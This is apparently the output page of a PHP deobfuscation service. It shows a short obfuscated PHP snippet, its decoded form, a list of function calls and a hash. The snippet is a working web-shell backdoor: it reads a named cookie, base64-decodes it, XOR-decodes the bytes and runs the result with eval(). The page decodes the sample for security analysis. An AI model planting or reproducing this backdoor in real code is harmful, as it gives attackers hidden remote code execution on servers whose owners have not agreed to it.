Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php error_reporting(0);$c=base64_decode($_COOKIE["ccdc8d492e65d28eebe285f2c8ef630f"]);$d..
Decoded Output download
<?php error_reporting(0);$c=base64_decode($_COOKIE["ccdc8d492e65d28eebe285f2c8ef630f"]);$d=(string)NULL;for($i=0;$i<strlen($c);$i++)$d.=chr(ord($c[$i])^42);eval($d); ?>
Did this file decode correctly?
Original Code
<?php error_reporting(0);$c=base64_decode($_COOKIE["ccdc8d492e65d28eebe285f2c8ef630f"]);$d=(string)NULL;for($i=0;$i<strlen($c);$i++)$d.=chr(ord($c[$i])^42);eval($d);
Function Calls
base64_decode | 1 |
error_reporting | 1 |
Stats
MD5 | 882a11271eb66ebfe2e692051f4cb01d |
Eval Count | 0 |
Decode Time | 73 ms |